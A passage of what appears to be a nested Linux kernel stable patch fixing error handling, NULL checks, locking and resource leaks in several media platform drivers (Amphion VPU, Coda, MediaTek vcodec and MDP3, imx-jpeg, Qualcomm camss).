+ 		dev_err(inst->dev, "[%d] send cmd(0x%x) fail\n", inst->id, id);
+ 
+diff --git a/drivers/media/platform/amphion/vpu_drv.c b/drivers/media/platform/amphion/vpu_drv.c
+index 9d5a5075343d3..f01ce49d27e80 100644
+--- a/drivers/media/platform/amphion/vpu_drv.c
++++ b/drivers/media/platform/amphion/vpu_drv.c
+@@ -245,7 +245,11 @@ static int __init vpu_driver_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return vpu_core_driver_init();
++	ret = vpu_core_driver_init();
++	if (ret)
++		platform_driver_unregister(&amphion_vpu_driver);
++
++	return ret;
+ }
+ 
+ static void __exit vpu_driver_exit(void)
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 51e0702f9ae17..9f2890730fd70 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -692,6 +692,7 @@ int vpu_malone_set_decode_params(struct vpu_shared_addr *shared,
+ }
+ 
+ static struct vpu_pair malone_cmds[] = {
++	{VPU_CMD_ID_NOOP, VID_API_CMD_NULL},
+ 	{VPU_CMD_ID_START, VID_API_CMD_START},
+ 	{VPU_CMD_ID_STOP, VID_API_CMD_STOP},
+ 	{VPU_CMD_ID_ABORT, VID_API_CMD_ABORT},
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index d8247f36d84ba..92672a802b492 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -43,6 +43,7 @@ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc
+ 		  req_data.ref_frame_num,
+ 		  req_data.act_buf_size,
+ 		  req_data.act_buf_num);
++	vpu_inst_lock(inst);
+ 	call_void_vop(inst, mem_request,
+ 		      req_data.enc_frame_size,
+ 		      req_data.enc_frame_num,
+@@ -50,6 +51,7 @@ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc
+ 		      req_data.ref_frame_num,
+ 		      req_data.act_buf_size,
+ 		      req_data.act_buf_num);
++	vpu_inst_unlock(inst);
+ }
+ 
+ static void vpu_session_handle_stop_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index b779e0ba916ca..590d1084e5a5d 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -65,18 +65,11 @@ unsigned int vpu_get_buffer_state(struct vb2_v4l2_buffer *vbuf)
+ 
+ void vpu_v4l2_set_error(struct vpu_inst *inst)
+ {
+-	struct vb2_queue *src_q;
+-	struct vb2_queue *dst_q;
+-
+ 	vpu_inst_lock(inst);
+ 	dev_err(inst->dev, "some error occurs in codec\n");
+ 	if (inst->fh.m2m_ctx) {
+-		src_q = v4l2_m2m_get_src_vq(inst->fh.m2m_ctx);
+-		dst_q = v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx);
+-		src_q->error = 1;
+-		dst_q->error = 1;
+-		wake_up(&src_q->done_wq);
+-		wake_up(&dst_q->done_wq);
++		vb2_queue_error(v4l2_m2m_get_src_vq(inst->fh.m2m_ctx));
++		vb2_queue_error(v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx));
+ 	}
+ 	vpu_inst_unlock(inst);
+ }
+@@ -249,8 +242,12 @@ int vpu_process_capture_buffer(struct vpu_inst *inst)
+ 
+ struct vb2_v4l2_buffer *vpu_next_src_buf(struct vpu_inst *inst)
+ {
+-	struct vb2_v4l2_buffer *src_buf = v4l2_m2m_next_src_buf(inst->fh.m2m_ctx);
++	struct vb2_v4l2_buffer *src_buf = NULL;
++
++	if (!inst->fh.m2m_ctx)
++		return NULL;
+ 
++	src_buf = v4l2_m2m_next_src_buf(inst->fh.m2m_ctx);
+ 	if (!src_buf || vpu_get_buffer_state(src_buf) == VPU_BUF_STATE_IDLE)
+ 		return NULL;
+ 
+@@ -273,7 +270,7 @@ void vpu_skip_frame(struct vpu_inst *inst, int count)
+ 	enum vb2_buffer_state state;
+ 	int i = 0;
+ 
+-	if (count <= 0)
++	if (count <= 0 || !inst->fh.m2m_ctx)
+ 		return;
+ 
+ 	while (i < count) {
+@@ -603,10 +600,6 @@ static int vpu_v4l2_release(struct vpu_inst *inst)
+ 		inst->workqueue = NULL;
+ 	}
+ 
+-	if (inst->fh.m2m_ctx) {
+-		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
+-		inst->fh.m2m_ctx = NULL;
+-	}
+ 	v4l2_ctrl_handler_free(&inst->ctrl_handler);
+ 	mutex_destroy(&inst->lock);
+ 	v4l2_fh_del(&inst->fh);
+@@ -689,6 +682,13 @@ int vpu_v4l2_close(struct file *file)
+ 
+ 	vpu_trace(vpu->dev, "tgid = %d, pid = %d, inst = %p\n", inst->tgid, inst->pid, inst);
+ 
++	vpu_inst_lock(inst);
++	if (inst->fh.m2m_ctx) {
++		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
++		inst->fh.m2m_ctx = NULL;
++	}
++	vpu_inst_unlock(inst);
++
+ 	call_void_vop(inst, release);
+ 	vpu_inst_unregister(inst);
+ 	vpu_inst_put(inst);
+diff --git a/drivers/media/platform/amphion/vpu_windsor.c b/drivers/media/platform/amphion/vpu_windsor.c
+index 1526af2ef9da4..b93c8cfdee7f5 100644
+--- a/drivers/media/platform/amphion/vpu_windsor.c
++++ b/drivers/media/platform/amphion/vpu_windsor.c
+@@ -658,6 +658,7 @@ int vpu_windsor_get_stream_buffer_size(struct vpu_shared_addr *shared)
+ }
+ 
+ static struct vpu_pair windsor_cmds[] = {
++	{VPU_CMD_ID_NOOP, GTB_ENC_CMD_NOOP},
+ 	{VPU_CMD_ID_CONFIGURE_CODEC, GTB_ENC_CMD_CONFIGURE_CODEC},
+ 	{VPU_CMD_ID_START, GTB_ENC_CMD_STREAM_START},
+ 	{VPU_CMD_ID_STOP, GTB_ENC_CMD_STREAM_STOP},
+diff --git a/drivers/media/platform/chips-media/coda-bit.c b/drivers/media/platform/chips-media/coda-bit.c
+index 2736a902e3df3..ed47d5bd8d61e 100644
+--- a/drivers/media/platform/chips-media/coda-bit.c
++++ b/drivers/media/platform/chips-media/coda-bit.c
+@@ -854,7 +854,7 @@ static void coda_setup_iram(struct coda_ctx *ctx)
+ 		/* Only H.264BP and H.263P3 are considered */
+ 		iram_info->buf_dbk_y_use = coda_iram_alloc(iram_info, w64);
+ 		iram_info->buf_dbk_c_use = coda_iram_alloc(iram_info, w64);
+-		if (!iram_info->buf_dbk_c_use)
++		if (!iram_info->buf_dbk_y_use || !iram_info->buf_dbk_c_use)
+ 			goto out;
+ 		iram_info->axi_sram_use |= dbk_bits;
+ 
+@@ -878,7 +878,7 @@ static void coda_setup_iram(struct coda_ctx *ctx)
+ 
+ 		iram_info->buf_dbk_y_use = coda_iram_alloc(iram_info, w128);
+ 		iram_info->buf_dbk_c_use = coda_iram_alloc(iram_info, w128);
+-		if (!iram_info->buf_dbk_c_use)
++		if (!iram_info->buf_dbk_y_use || !iram_info->buf_dbk_c_use)
+ 			goto out;
+ 		iram_info->axi_sram_use |= dbk_bits;
+ 
+@@ -1084,10 +1084,16 @@ static int coda_start_encoding(struct coda_ctx *ctx)
+ 	}
+ 
+ 	if (dst_fourcc == V4L2_PIX_FMT_JPEG) {
+-		if (!ctx->params.jpeg_qmat_tab[0])
++		if (!ctx->params.jpeg_qmat_tab[0]) {
+ 			ctx->params.jpeg_qmat_tab[0] = kmalloc(64, GFP_KERNEL);
+-		if (!ctx->params.jpeg_qmat_tab[1])
++			if (!ctx->params.jpeg_qmat_tab[0])
++				return -ENOMEM;
++		}
++		if (!ctx->params.jpeg_qmat_tab[1]) {
+ 			ctx->params.jpeg_qmat_tab[1] = kmalloc(64, GFP_KERNEL);
++			if (!ctx->params.jpeg_qmat_tab[1])
++				return -ENOMEM;
++		}
+ 		coda_set_jpeg_compression_quality(ctx, ctx->params.jpeg_quality);
+ 	}
+ 
+diff --git a/drivers/media/platform/chips-media/coda-jpeg.c b/drivers/media/platform/chips-media/coda-jpeg.c
+index 435e7030fc2a8..ba8f410029172 100644
+--- a/drivers/media/platform/chips-media/coda-jpeg.c
++++ b/drivers/media/platform/chips-media/coda-jpeg.c
+@@ -1052,10 +1052,16 @@ static int coda9_jpeg_start_encoding(struct coda_ctx *ctx)
+ 		v4l2_err(&dev->v4l2_dev, "error loading Huffman tables\n");
+ 		return ret;
+ 	}
+-	if (!ctx->params.jpeg_qmat_tab[0])
++	if (!ctx->params.jpeg_qmat_tab[0]) {
+ 		ctx->params.jpeg_qmat_tab[0] = kmalloc(64, GFP_KERNEL);
+-	if (!ctx->params.jpeg_qmat_tab[1])
++		if (!ctx->params.jpeg_qmat_tab[0])
++			return -ENOMEM;
++	}
++	if (!ctx->params.jpeg_qmat_tab[1]) {
+ 		ctx->params.jpeg_qmat_tab[1] = kmalloc(64, GFP_KERNEL);
++		if (!ctx->params.jpeg_qmat_tab[1])
++			return -ENOMEM;
++	}
+ 	coda_set_jpeg_compression_quality(ctx, ctx->params.jpeg_quality);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
+index 86c054600a08c..124c1b96e96bd 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
+@@ -252,10 +252,9 @@ static int mdp_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *pkt,
+ 	dma_addr_t dma_addr;
+ 
+ 	pkt->va_base = kzalloc(size, GFP_KERNEL);
+-	if (!pkt->va_base) {
+-		kfree(pkt);
++	if (!pkt->va_base)
+ 		return -ENOMEM;
+-	}
++
+ 	pkt->buf_size = size;
+ 	pkt->cl = (void *)client;
+ 
+@@ -368,25 +367,30 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+ 	if (!cmd) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_cancel_job;
+ 	}
+ 
+-	if (mdp_cmdq_pkt_create(mdp->cmdq_clt, &cmd->pkt, SZ_16K)) {
+-		ret = -ENOMEM;
+-		goto err_cmdq_data;
+-	}
++	ret = mdp_cmdq_pkt_create(mdp->cmdq_clt, &cmd->pkt, SZ_16K);
++	if (ret)
++		goto err_free_cmd;
+ 
+ 	comps = kcalloc(param->config->num_components, sizeof(*comps),
+ 			GFP_KERNEL);
+ 	if (!comps) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_destroy_pkt;
+ 	}
+ 
+ 	path = kzalloc(sizeof(*path), GFP_KERNEL);
+ 	if (!path) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_free_comps;
++	}
++
++	ret = mtk_mutex_prepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
++	if (ret) {
++		dev_err(dev, "Fail to enable mutex clk\n");
++		goto err_free_path;
+ 	}
+ 
+ 	path->mdp_dev = mdp;
+@@ -406,15 +410,13 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	ret = mdp_path_ctx_init(mdp, path);
+ 	if (ret) {
+ 		dev_err(dev, "mdp_path_ctx_init error\n");
+-		goto err_cmdq_data;
++		goto err_free_path;
+ 	}
+ 
+-	mtk_mutex_prepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+-
+ 	ret = mdp_path_config(mdp, cmd, path);
+ 	if (ret) {
+ 		dev_err(dev, "mdp_path_config error\n");
+-		goto err_cmdq_data;
++		goto err_free_path;
+ 	}
+ 	cmdq_pkt_finalize(&cmd->pkt);
+ 
+@@ -431,10 +433,8 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	cmd->mdp_ctx = param->mdp_ctx;
+ 
+ 	ret = mdp_comp_clocks_on(&mdp->pdev->dev, cmd->comps, cmd->num_comps);
+-	if (ret) {
+-		dev_err(dev, "comp %d failed to enable clock!\n", ret);
+-		goto err_clock_off;
+-	}
++	if (ret)
++		goto err_free_path;
+ 
+ 	dma_sync_single_for_device(mdp->cmdq_clt->chan->mbox->dev,
+ 				   cmd->pkt.pa_base, cmd->pkt.cmd_buf_size,
+@@ -450,17 +450,20 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	return 0;
+ 
+ err_clock_off:
+-	mtk_mutex_unprepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+ 	mdp_comp_clocks_off(&mdp->pdev->dev, cmd->comps,
+ 			    cmd->num_comps);
+-err_cmdq_data:
++err_free_path:
++	mtk_mutex_unprepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+ 	kfree(path);
+-	atomic_dec(&mdp->job_count);
+-	wake_up(&mdp->callback_wq);
+-	if (cmd && cmd->pkt.buf_size > 0)
+-		mdp_cmdq_pkt_destroy(&cmd->pkt);
++err_free_comps:
+ 	kfree(comps);
++err_destroy_pkt:
++	mdp_cmdq_pkt_destroy(&cmd->pkt);
++err_free_cmd:
+ 	kfree(cmd);
++err_cancel_job:
++	atomic_dec(&mdp->job_count);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(mdp_cmdq_send);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+index d3eaf8884412d..7bc05f42a23c1 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+@@ -699,12 +699,22 @@ int mdp_comp_clock_on(struct device *dev, struct mdp_comp *comp)
+ 			dev_err(dev,
+ 				"Failed to enable clk %d. type:%d id:%d\n",
+ 				i, comp->type, comp->id);
+-			pm_runtime_put(comp->comp_dev);
+-			return ret;
++			goto err_revert;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_revert:
++	while (--i >= 0) {
++		if (IS_ERR_OR_NULL(comp->clks[i]))
++			continue;
++		clk_disable_unprepare(comp->clks[i]);
++	}
++	if (comp->comp_dev)
++		pm_runtime_put_sync(comp->comp_dev);
++
++	return ret;
+ }
+ 
+ void mdp_comp_clock_off(struct device *dev, struct mdp_comp *comp)
+@@ -723,11 +733,13 @@ void mdp_comp_clock_off(struct device *dev, struct mdp_comp *comp)
+ 
+ int mdp_comp_clocks_on(struct device *dev, struct mdp_comp *comps, int num)
+ {
+-	int i;
++	int i, ret;
+ 
+-	for (i = 0; i < num; i++)
+-		if (mdp_comp_clock_on(dev, &comps[i]) != 0)
+-			return ++i;
++	for (i = 0; i < num; i++) {
++		ret = mdp_comp_clock_on(dev, &comps[i]);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index c413e59d42860..2d1f6ae9f0802 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -196,27 +196,27 @@ static int mdp_probe(struct platform_device *pdev)
+ 	mm_pdev = __get_pdev_by_id(pdev, MDP_INFRA_MMSYS);
+ 	if (!mm_pdev) {
+ 		ret = -ENODEV;
+-		goto err_return;
++		goto err_destroy_device;
+ 	}
+ 	mdp->mdp_mmsys = &mm_pdev->dev;
+ 
+ 	mm_pdev = __get_pdev_by_id(pdev, MDP_INFRA_MUTEX);
+ 	if (WARN_ON(!mm_pdev)) {
+ 		ret = -ENODEV;
+-		goto err_return;
++		goto err_destroy_device;
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+ 		if (!mdp->mdp_mutex[i]) {
+ 			ret = -ENODEV;
+-			goto err_return;
++			goto err_free_mutex;
+ 		}
+ 	}
+ 
+ 	ret = mdp_comp_config(mdp);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to config mdp components\n");
+-		goto err_return;
++		goto err_free_mutex;
+ 	}
+ 
+ 	mdp->job_wq = alloc_workqueue(MDP_MODULE_NAME, WQ_FREEZABLE, 0);
+@@ -287,11 +287,12 @@ err_destroy_job_wq:
+ 	destroy_workqueue(mdp->job_wq);
+ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+-err_return:
++err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		if (mdp)
+-			mtk_mutex_put(mdp->mdp_mutex[i]);
++		mtk_mutex_put(mdp->mdp_mutex[i]);
++err_destroy_device:
+ 	kfree(mdp);
++err_return:
+ 	dev_dbg(dev, "Errno %d\n", ret);
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index c45bd2599bb2d..ffbcee04dc26f 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -138,10 +138,13 @@ static void mtk_vdec_stateless_cap_to_disp(struct mtk_vcodec_ctx *ctx, int error
+ 		state = VB2_BUF_STATE_DONE;
+ 
+ 	vb2_dst = v4l2_m2m_dst_buf_remove(ctx->m2m_ctx);
+-	v4l2_m2m_buf_done(vb2_dst, state);
+-
+-	mtk_v4l2_debug(2, "free frame buffer id:%d to done list",
+-		       vb2_dst->vb2_buf.index);
++	if (vb2_dst) {
++		v4l2_m2m_buf_done(vb2_dst, state);
++		mtk_v4l2_debug(2, "free frame buffer id:%d to done list",
++			       vb2_dst->vb2_buf.index);
++	} else {
++		mtk_v4l2_err("dst buffer is NULL");
++	}
+ 
+ 	if (src_buf_req)
+ 		v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+@@ -250,7 +253,7 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 
+ 	state = ret ? VB2_BUF_STATE_ERROR : VB2_BUF_STATE_DONE;
+ 	if (!IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch) ||
+-	    ctx->current_codec == V4L2_PIX_FMT_VP8_FRAME || ret) {
++	    ctx->current_codec == V4L2_PIX_FMT_VP8_FRAME) {
+ 		v4l2_m2m_buf_done_and_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx, state);
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 4cc92700692b3..955b2d0c8f53f 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+@@ -471,14 +471,19 @@ static int vdec_h264_slice_core_decode(struct vdec_lat_buf *lat_buf)
+ 	       sizeof(share_info->h264_slice_params));
+ 
+ 	fb = ctx->dev->vdec_pdata->get_cap_buffer(ctx);
+-	y_fb_dma = fb ? (u64)fb->base_y.dma_addr : 0;
+-	vdec_fb_va = (unsigned long)fb;
++	if (!fb) {
++		err = -EBUSY;
++		mtk_vcodec_err(inst, "fb buffer is NULL");
++		goto vdec_dec_end;
++	}
+ 
++	vdec_fb_va = (unsigned long)fb;
++	y_fb_dma = (u64)fb->base_y.dma_addr;
+ 	if (ctx->q_data[MTK_Q_DATA_DST].fmt->num_planes == 1)
+ 		c_fb_dma =
+ 			y_fb_dma + inst->ctx->picinfo.buf_w * inst->ctx->picinfo.buf_h;
+ 	else
+-		c_fb_dma = fb ? (u64)fb->base_c.dma_addr : 0;
++		c_fb_dma = (u64)fb->base_c.dma_addr;
+ 
+ 	mtk_vcodec_debug(inst, "[h264-core] y/c addr = 0x%llx 0x%llx", y_fb_dma,
+ 			 c_fb_dma);
+@@ -539,6 +544,29 @@ vdec_dec_end:
+ 	return 0;
+ }
+ 
++static void vdec_h264_insert_startcode(struct mtk_vcodec_dev *vcodec_dev, unsigned char *buf,
++				       size_t *bs_size, struct mtk_h264_pps_param *pps)
++{
++	struct device *dev = &vcodec_dev->plat_dev->dev;
++
++	/* Need to add pending data at the end of bitstream when bs_sz is small than
++	 * 20 bytes for cavlc bitstream, or lat will decode fail. This pending data is
++	 * useful for mt8192 and mt8195 platform.
++	 *
++	 * cavlc bitstream when entropy_coding_mode_flag is false.
++	 */
++	if (pps->entropy_coding_mode_flag || *bs_size > 20 ||
++	    !(of_device_is_compatible(dev->of_node, "mediatek,mt8192-vcodec-dec") ||
++	    of_device_is_compatible(dev->of_node, "mediatek,mt8195-vcodec-dec")))
++		return;
++
++	buf[*bs_size] = 0;
++	buf[*bs_size + 1] = 0;
++	buf[*bs_size + 2] = 1;
++	buf[*bs_size + 3] = 0xff;
++	(*bs_size) += 4;
++}
++
+ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 				      struct vdec_fb *fb, bool *res_chg)
+ {
+@@ -582,9 +610,6 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	}
+ 
+ 	inst->vsi->dec.nal_info = buf[nal_start_idx];
+-	inst->vsi->dec.bs_buf_addr = (u64)bs->dma_addr;
+-	inst->vsi->dec.bs_buf_size = bs->size;
+-
+ 	lat_buf->src_buf_req = src_buf_info->m2m_buf.vb.vb2_buf.req_obj.req;
+ 	v4l2_m2m_buf_copy_metadata(&src_buf_info->m2m_buf.vb, &lat_buf->ts_info, true);
+ 
+@@ -592,6 +617,12 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	if (err)
+ 		goto err_free_fb_out;
+ 
++	vdec_h264_insert_startcode(inst->ctx->dev, buf, &bs->size,
++				   &share_info->h264_slice_params.pps);
++
++	inst->vsi->dec.bs_buf_addr = (uint64_t)bs->dma_addr;
++	inst->vsi->dec.bs_buf_size = bs->size;
++
+ 	*res_chg = inst->resolution_changed;
+ 	if (inst->resolution_changed) {
+ 		mtk_vcodec_debug(inst, "- resolution changed -");
+@@ -630,7 +661,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	err = vpu_dec_start(vpu, data, 2);
+ 	if (err) {
+ 		mtk_vcodec_debug(inst, "lat decode err: %d", err);
+-		goto err_scp_decode;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	share_info->trans_end = inst->ctx->msg_queue.wdma_addr.dma_addr +
+@@ -647,12 +678,17 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	/* wait decoder done interrupt */
+ 	timeout = mtk_vcodec_wait_for_done_ctx(inst->ctx, MTK_INST_IRQ_RECEIVED,
+ 					       WAIT_INTR_TIMEOUT_MS, MTK_VDEC_LAT0);
++	if (timeout)
++		mtk_vcodec_err(inst, "lat decode timeout: pic_%d", inst->slice_dec_num);
+ 	inst->vsi->dec.timeout = !!timeout;
+ 
+ 	err = vpu_dec_end(vpu);
+-	if (err == SLICE_HEADER_FULL || timeout || err == TRANS_BUFFER_FULL) {
+-		err = -EINVAL;
+-		goto err_scp_decode;
++	if (err == SLICE_HEADER_FULL || err == TRANS_BUFFER_FULL) {
++		if (!IS_VDEC_INNER_RACING(inst->ctx->dev->dec_capability))
++			vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
++		inst->slice_dec_num++;
++		mtk_vcodec_err(inst, "lat dec fail: pic_%d err:%d", inst->slice_dec_num, err);
++		return -EINVAL;
+ 	}
+ 
+ 	share_info->trans_end = inst->ctx->msg_queue.wdma_addr.dma_addr +
+@@ -669,10 +705,6 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 
+ 	inst->slice_dec_num++;
+ 	return 0;
+-
+-err_scp_decode:
+-	if (!IS_VDEC_INNER_RACING(inst->ctx->dev->dec_capability))
+-		vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
+ err_free_fb_out:
+ 	vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
+ 	mtk_vcodec_err(inst, "slice dec number: %d err: %d", inst->slice_dec_num, err);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index fb1c36a3592d1..cbb6728b8a40b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2073,21 +2073,23 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 		return -EBUSY;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+-	if (!pfc)
+-		return -EINVAL;
++	if (!pfc) {
++		ret = -EINVAL;
++		goto err_free_fb_out;
++	}
+ 	vsi = &pfc->vsi;
+ 
+ 	ret = vdec_vp9_slice_setup_lat(instance, bs, lat_buf, pfc);
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "Failed to setup VP9 lat ret %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 	vdec_vp9_slice_vsi_to_remote(vsi, instance->vsi);
+ 
+ 	ret = vpu_dec_start(&instance->vpu, NULL, 0);
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "Failed to dec VP9 ret %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	if (instance->irq) {
+@@ -2107,7 +2109,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	/* LAT trans full, no more UBE or decode timeout */
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "VP9 decode error: %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	mtk_vcodec_debug(instance, "lat dma addr: 0x%lx 0x%lx\n",
+@@ -2120,6 +2122,9 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	vdec_msg_queue_qbuf(&ctx->dev->msg_queue_core_ctx, lat_buf);
+ 
+ 	return 0;
++err_free_fb_out:
++	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
++	return ret;
+ }
+ 
+ static int vdec_vp9_slice_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index ae500980ad45c..dc2004790a472 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -221,7 +221,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&ctx->msg_queue.lat_ctx.ready_queue)) {
++	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+ 		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+ 			       dev->msg_queue_core_ctx.ready_num);
+ 		queue_work(dev->core_workqueue, &msg_queue->core_work);
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
+index 9418fcf740a82..ef28122a5ed49 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
+@@ -76,12 +76,14 @@ void print_wrapper_info(struct device *dev, void __iomem *reg)
+ 
+ void mxc_jpeg_enable_irq(void __iomem *reg, int slot)
+ {
+-	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
++	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_STATUS));
++	writel(0xF0C, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
+ }
+ 
+ void mxc_jpeg_disable_irq(void __iomem *reg, int slot)
+ {
+ 	writel(0x0, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
++	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_STATUS));
+ }
+ 
+ void mxc_jpeg_sw_reset(void __iomem *reg)
+diff --git a/drivers/media/platform/qcom/camss/camss-video.c b/drivers/media/platform/qcom/camss/camss-video.c
+index 81fb3a5bc1d51..41deda232e4a1 100644
+--- a/drivers/media/platform/qcom/camss/camss-video.c
++++ b/drivers/media/platform/qcom/camss/camss-video.c
+@@ -495,7 +495,7 @@ static int video_start_streaming(struct vb2_queue *q, unsigned int count)
+ 
+ 	ret = video_device_pipeline_start(vdev, &video->pipe);
+ 	if (ret < 0)
+-		return ret;
++		goto flush_buffers;
+ 
